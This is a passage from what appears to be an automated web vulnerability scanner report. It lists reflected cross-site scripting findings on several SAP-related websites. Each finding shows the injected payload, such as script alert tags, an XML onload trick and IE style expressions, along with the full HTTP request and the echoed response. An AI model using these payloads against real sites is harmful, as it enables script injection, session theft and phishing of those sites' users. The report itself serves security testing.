HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 33986 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:19 GMT; path=/ Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:19 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 15:03:19 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='texta2480';b72d33e177b'; var DOCUMENTNAME='Error';
The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 38958'%3bda57bbc2a62 was submitted in the REST URL parameter 1. This input was echoed as 38958';da57bbc2a62 in the application's response.
This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /text38958'%3bda57bbc2a62/zzzzzz=yyyyy HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 404 File Not Found Cache-Control: private Content-Length: 33914 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:03:26 GMT; path=/ Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:03:26 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 15:03:44 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head>
<script langua ...[SNIP]... <script language="Javascript"> var DOCUMENTGROUP='text38958';da57bbc2a62'; var DOCUMENTNAME='Error';
var _s_cf17='Global';
</script> ...[SNIP]...
3.86. https://www.sap.com/contactsap/contact_warning.epx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.sap.com
Path:
/contactsap/contact_warning.epx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b53d3"><script>alert(1)</script>f9f797a16d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /contactsap/contact_warning.epx?b53d3"><script>alert(1)</script>f9f797a16d1=1 HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 3577 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:04:39 GMT; path=/ Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:04:39 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 15:04:43 GMT Connection: close
3.87. https://www.sap.com/profile/warning.epx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
https://www.sap.com
Path:
/profile/warning.epx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 54634"><script>alert(1)</script>c3e800f960b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /profile/warning.epx?54634"><script>alert(1)</script>c3e800f960b=1 HTTP/1.1 Host: www.sap.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Cache-Control: private Content-Length: 5163 Content-Type: text/html; charset=utf-8 Server: Microsoft-IIS/7.5 X-AspNet-Version: 4.0.30319 Set-Cookie: client=bfdf9613-7ac8-4534-a2c0-c88ebd9fbac7; domain=.sap.com; expires=Mon, 14-Oct-2013 15:05:07 GMT; path=/ Set-Cookie: SAP.TTC=1318688442; domain=.sap.com; expires=Fri, 13-Jan-2012 16:05:07 GMT; path=/ p3p: CP="CAO CURa ADMa DEVa TAIa PSAa PSDa CONi OUR DELi LEG PHY ONL UNI COM NAV INT DEM PRE" Date: Sat, 15 Oct 2011 15:05:13 GMT Connection: close
The value of the xajax request parameter is copied into the XML document as plain text between tags. The payload c6c53<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>9e68deb371861330c was submitted in the xajax parameter. This input was echoed as c6c53<a xmlns:a='http://www.w3.org/1999/xhtml'><a:body onload='alert(1)'/></a>9e68deb371861330c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The response into which the attack is echoed contains XML data, which is not by default processed by the browser as HTML. However, by injecting XML elements which create a new namespace it is possible to trick some browsers (including Firefox) into processing part of the response as HTML. Note that this proof-of-concept attack is designed to execute when processed by the browser as a standalone response, not when the XML is consumed by a script within another page.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
GET /?xajax=registerUserc6c53<a%20xmlns%3aa%3d'http%3a//www.w3.org/1999/xhtml'><a%3abody%20onload%3d'alert(1)'/></a>9e68deb371861330c&xajaxr=1318692636849 HTTP/1.1 Host: www.sapbusinessoptimizer.com Proxy-Connection: keep-alive Origin: http://www.sapbusinessoptimizer.com Method: POST http://www.sapbusinessoptimizer.com/ HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/14.0.835.202 Safari/535.1 Accept: */* Referer: http://www.sapbusinessoptimizer.com/ Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: _pk_ref.6.52a4=1318692589.http%3A%2F%2Fburp%2Fshow%2F28; PHPSESSID=80919d45b65a6e627a6f2d33b9be0d7a; _pk_id.6.52a4=7b8ad9472e0c4cae.1318692589.1.1318692630.1318692589; _pk_ses.6.52a4=*
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 962bb"><script>alert(1)</script>4cbb556654f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:29:36 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 825 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... <a href="http://www.sapbusinessoptimizer.com/css962bb"><script>alert(1)</script>4cbb556654f/fancy-popup-styles.css"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 93738<script>alert(1)</script>2090b0d7ed was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:29:36 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 819 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... </script>2090b0d7ed/fancy-popup-styles.css">http://www.sapbusinessoptimizer.com/css93738<script>alert(1)</script>2090b0d7ed/fancy-popup-styles.css</a> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 74698"><script>alert(1)</script>0d84999f009 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:29:37 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 825 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... <a href="http://www.sapbusinessoptimizer.com/css/fancy-popup-styles.css74698"><script>alert(1)</script>0d84999f009"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 2bad6<script>alert(1)</script>603e9c4cf8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:29:38 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 821 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... </script>603e9c4cf8c">http://www.sapbusinessoptimizer.com/css/fancy-popup-styles.css2bad6<script>alert(1)</script>603e9c4cf8c</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ab7fe"><script>alert(1)</script>a5d7dab7a6f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:29:45 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 795 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... <a href="http://www.sapbusinessoptimizer.com/favicon.icoab7fe"><script>alert(1)</script>a5d7dab7a6f"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 18538<script>alert(1)</script>0816d580e57 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:29:45 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 791 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... </script>0816d580e57">http://www.sapbusinessoptimizer.com/favicon.ico18538<script>alert(1)</script>0816d580e57</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload f27d4<script>alert(1)</script>9e1fbf305d2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:31:04 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 901 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... </script>9e1fbf305d2/script%3Ea5d7dab7a6f">http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3Cf27d4<script>alert(1)</script>9e1fbf305d2/script%3Ea5d7dab7a6f</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a7c89"><script>alert(1)</script>713d58a2cd2 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:31:04 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 905 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... <a href="http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3Ca7c89"><script>alert(1)</script>713d58a2cd2/script%3Ea5d7dab7a6f"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 69a3a"><script>alert(1)</script>699ec413f8c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:31:05 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 905 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... <a href="http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f69a3a"><script>alert(1)</script>699ec413f8c"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 86c22<script>alert(1)</script>99a0b1eb0e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:31:06 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 901 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... </script>99a0b1eb0e3">http://www.sapbusinessoptimizer.com/favicon.icoab7fe%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea5d7dab7a6f86c22<script>alert(1)</script>99a0b1eb0e3</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 8acc2<script>alert(1)</script>01c7804de87 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:29:57 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 839 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... </script>01c7804de87/SAPSans2007ExtraBoldCond.woff">http://www.sapbusinessoptimizer.com/fonts8acc2<script>alert(1)</script>01c7804de87/SAPSans2007ExtraBoldCond.woff</a> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a14ba"><script>alert(1)</script>01e6d48cacd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:29:56 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 843 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... <a href="http://www.sapbusinessoptimizer.com/fontsa14ba"><script>alert(1)</script>01e6d48cacd/SAPSans2007ExtraBoldCond.woff"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload 26a30<script>alert(1)</script>99080e416fe was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:29:58 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 839 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... </script>99080e416fe">http://www.sapbusinessoptimizer.com/fonts/SAPSans2007ExtraBoldCond.woff26a30<script>alert(1)</script>99080e416fe</a> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c35b9"><script>alert(1)</script>cb0a464daf0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:29:57 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 843 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... <a href="http://www.sapbusinessoptimizer.com/fonts/SAPSans2007ExtraBoldCond.woffc35b9"><script>alert(1)</script>cb0a464daf0"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 86654"><script>alert(1)</script>9a99eb8cf35 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:29:49 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 807 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... <a href="http://www.sapbusinessoptimizer.com/js86654"><script>alert(1)</script>9a99eb8cf35/swc/common.tao"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload ff9f9<script>alert(1)</script>98e1be46692 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:29:50 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 803 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... </script>98e1be46692/swc/common.tao">http://www.sapbusinessoptimizer.com/jsff9f9<script>alert(1)</script>98e1be46692/swc/common.tao</a> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ded0b"><script>alert(1)</script>a2327f34e3 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:29:50 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 805 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... <a href="http://www.sapbusinessoptimizer.com/js/swcded0b"><script>alert(1)</script>a2327f34e3/common.tao"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c2db3<script>alert(1)</script>2ad3d8843b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:29:51 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 803 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... </script>2ad3d8843b1/common.tao">http://www.sapbusinessoptimizer.com/js/swcc2db3<script>alert(1)</script>2ad3d8843b1/common.tao</a> ...[SNIP]...
The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload abbb8<script>alert(1)</script>28ecfb46467 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:29:52 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 803 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... </script>28ecfb46467">http://www.sapbusinessoptimizer.com/js/swc/common.taoabbb8<script>alert(1)</script>28ecfb46467</a> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6f770"><script>alert(1)</script>5e7e43a56dc was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 404 Not Found Date: Sat, 15 Oct 2011 15:29:52 GMT Server: Apache Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Content-Length: 807 Content-Type: text/html
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html> <head> <title>Error: 404 - Page Not Found - error 404</title> <style type="text/css"> body{font-family:Verdana,Tahoma,Helvetica,Arial,sans-ser ...[SNIP]... <a href="http://www.sapbusinessoptimizer.com/js/swc/common.tao6f770"><script>alert(1)</script>5e7e43a56dc"> ...[SNIP]...
The value of the ReturnUrl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fcf2f"style%3d"x%3aexpression(alert(1))"34bced315ef was submitted in the ReturnUrl parameter. This input was echoed as fcf2f"style="x:expression(alert(1))"34bced315ef in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
The value of the a00f1%22style%3d%22x%3aexpression(alert(1))%225e28a9da3e5 request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload f5712%20style%3dx%3aexpression(alert(1))%20272adda801e was submitted in the a00f1%22style%3d%22x%3aexpression(alert(1))%225e28a9da3e5 parameter. This input was echoed as f5712 style=x:expression(alert(1)) 272adda801e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 15 Oct 2011 15:29:52 GMT Content-Length: 43078
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head id="Head1"><title> S ...[SNIP]... <input id="retUrl" type="hidden"value ="http://www.sapandasug.com/virtual/?ReturnUrl=http://www.sapphirenow.com/login.aspx?ReturnUrl=/default.aspx&a00f1"style="x:expression(alert(1))"5e28a9da3e5=1f5712 style=x:expression(alert(1)) 272adda801e" style="width: 668px" /> ...[SNIP]...
3.111. http://www.sapphirenow.com/login.aspx [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.sapphirenow.com
Path:
/login.aspx
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a00f1"style%3d"x%3aexpression(alert(1))"5e28a9da3e5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a00f1"style="x:expression(alert(1))"5e28a9da3e5 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbitrary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET Date: Sat, 15 Oct 2011 14:26:21 GMT Content-Length: 42982
